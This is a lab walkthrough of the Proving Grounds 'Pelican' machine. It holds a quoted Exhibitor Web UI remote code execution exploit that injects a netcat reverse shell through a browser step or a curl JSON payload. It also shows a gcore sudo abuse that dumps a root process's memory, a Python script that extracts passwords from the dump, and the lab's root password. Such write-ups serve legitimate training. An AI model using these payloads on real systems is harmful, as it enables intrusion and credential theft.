
PG: Pelican | Walkthrough

August 24, 2021
3 min read

Enumeration

Network scan with Nmap

Terminal window
$ nmap $ip -p22,139,445,631,2181,8080,8081,40837 -sVC
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-24 11:38 +0545
Nmap scan report for 192.168.66.98
Host is up (0.49s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_ 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
|_http-title: Forbidden - CUPS v2.2.10
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp open zookeeper Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
8080/tcp open http Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp open http nginx 1.14.2
|_http-title: Did not follow redirect to http://192.168.66.98:8080/exhibitor/v1/ui/index.html
|_http-server-header: nginx/1.14.2
40837/tcp open java-rmi Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 8081 (nginx) redirects to the Exhibitor web UI at http://192.168.66.98:8080/exhibitor/v1/ui/index.html, so the application worth looking at is Exhibitor, the ZooKeeper supervisor behind the Jetty service on 8080.

Search for known exploits for Exhibitor:

Terminal window
$ searchsploit exhibitor
Exhibitor Web UI 1.7.1 - Remote Code Execution | java/webapps/48654.txt
<snip>
The steps to exploit it from a web browser:
Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
In the "java.env script" field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:
$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
Click Commit > All At Once > OK
The command may take up to a minute to execute.
It can also be performed with a single curl command:
command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set
data.json:
{
  "zookeeperInstallDirectory": "/opt/zookeeper",
  "zookeeperDataDirectory": "/opt/zookeeper/snapshots",
  "zookeeperLogDirectory": "/opt/zookeeper/transactions",
  "logIndexDirectory": "/opt/zookeeper/transactions",
  "autoManageInstancesSettlingPeriodMs": "0",
  "autoManageInstancesFixedEnsembleSize": "0",
  "autoManageInstancesApplyAllAtOnce": "1",
  "observerThreshold": "0",
  "serversSpec": "1:exhibitor-demo",
  "javaEnvironment": "$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)",
  "log4jProperties": "",
  "clientPort": "2181",
  "connectPort": "2888",
  "electionPort": "3888",
  "checkMs": "30000",
  "cleanupPeriodMs": "300000",
  "cleanupMaxFiles": "20",
  "backupPeriodMs": "600000",
  "backupMaxStoreMs": "21600000",
  "autoManageInstances": "1",
  "zooCfgExtra": {
    "tickTime": "2000",
    "initLimit": "10",
    "syncLimit": "5",
    "quorumListenOnAllIPs": true
  },
  "backupExtra": {
    "directory": ""
  },
  "serverId": 1
}
Mitigation
<snip>

Privilege Escalation

Terminal window
charles@pelican:~$ sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore

gcore dumps the memory of a running process, and the sudo rule lets charles run it as root with no password, so the memory of any root-owned process, credentials included, is readable. List the processes running as root to pick a target:

Terminal window
charles@pelican:~$ ps -aux | grep '^root'
<snip>
root 471 0.0 0.1 9468 2480 ? S 00:36 0:00 /usr/sbin/CRON -f
root 479 0.0 0.0 2388 1568 ? Ss 00:36 0:00 /bin/sh -c while true; do chown -R charles:charles /opt/zookeeper && chown -R charles:charles /opt/exhibitor && sleep 1; done
root 495 0.0 0.0 2276 72 ? Ss 00:36 0:00 /usr/bin/password-store
root 498 0.0 0.4 235840 8824 ? Ssl 00:36 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 555 0.0 0.3 313364 6920 ? Ssl 00:36 0:00 /usr/sbin/lightdm
root 583 0.0 0.3 15852 7112 ? Ss 00:36 0:00 /usr/sbin/sshd -D
<snip>

Dump the memory of the root-owned /usr/bin/password-store process (PID 495) with gcore. Its name suggests it holds a credential, and because the dump is taken through sudo it runs with root's ptrace rights, so the process's protection from ordinary users does not apply.

Terminal window
charles@pelican:~$ sudo /usr/bin/gcore 495
0x00007f50a9fce6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffccf6689b0, remaining=remaining@entry=0x7ffccf6689b0) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.495
[Inferior 1 (process 495) detached]
charles@pelican:~$ ls
core.495 local.txt

Run strings over the core file to pull out the readable text; the root password appears directly after the "Password: root:" prompt string that the process kept in memory.

Terminal window
charles@pelican:~$ strings core.495
<snip>
001 Password: root:
ClogKingpinInning731
x86_64
/usr/bin/password-store
HOME=/root
LOGNAME=root
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
<snip>
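Reading a full strings dump by eye does not scale once the process is larger than this one, so here is an added example, not code from the walkthrough, that automates the step: it re-implements the part of strings(1) the walkthrough relies on (runs of printable ASCII of a minimum length) and then pairs every "Password:" marker with the strings that follow it, filtering out environment assignments and paths. The SAMPLE_CORE bytes are constructed for this example; only the fragment contents are taken from the strings output above, and the surrounding padding and ordering are made up.

```python
"""Added example (not from the original walkthrough): pull credential-like
strings out of a process memory dump such as the core.495 produced above.
SAMPLE_CORE is constructed for this example; it is not a real core file.
"""
import re
import sys

# Constructed sample: NUL-separated fragments like a core dump's data segment.
SAMPLE_CORE = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 24
    + b"001 Password: root:\x00"
    + b"ClogKingpinInning731\x00"
    + b"\x01\x02\x03"
    + b"x86_64\x00/usr/bin/password-store\x00"
    + b"HOME=/root\x00LOGNAME=root\x00"
)


def strings(blob, min_len=4):
    """Return the printable-ASCII runs of at least min_len bytes, in order.

    min_len=4 matches the default of strings(1); raising it trims the noise
    from a large dump at the cost of missing short secrets.
    """
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group(0).decode("ascii") for m in pat.finditer(blob)]


def password_candidates(blob, marker="Password:", lookahead=3):
    """Pair each "Password:" marker with the strings that follow it.

    Returns (label, candidate) tuples: label is whatever follows the marker
    on the same string (e.g. "root"), candidate is one of the next
    `lookahead` strings. A secret is not always the very next string in
    memory, hence looking a few strings ahead; environment assignments and
    paths are skipped because they are never the credential.
    """
    found = []
    runs = strings(blob)
    for i, s in enumerate(runs):
        if marker not in s:
            continue
        label = s.split(marker, 1)[1].strip().rstrip(":")
        for cand in runs[i + 1:i + 1 + lookahead]:
            if "=" in cand or cand.startswith("/"):
                continue
            found.append((label, cand))
    return found


if __name__ == "__main__":
    # Usage: python3 core_secrets.py core.495   (no argument: uses the sample)
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else SAMPLE_CORE
    for label, cand in password_candidates(data):
        print("%s -> %s" % (label or "?", cand))
```

On the real core.495 the first candidate is the one to try with su; the others are just the strings that happened to sit nearby. The underlying lesson for defenders is that a NOPASSWD sudo entry for a memory or file reader such as gcore is equivalent to handing out root: any secret a root process holds in memory is one command away.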

Change user to root

Terminal window
charles@pelican:~$ su root
Password: ClogKingpinInning731
root@pelican:/home/charles# whoami
root
root@pelican:/home/charles# cd
root@pelican:~# cat proof.txt
ff68887c70d3c00594b53fb4d36e7c23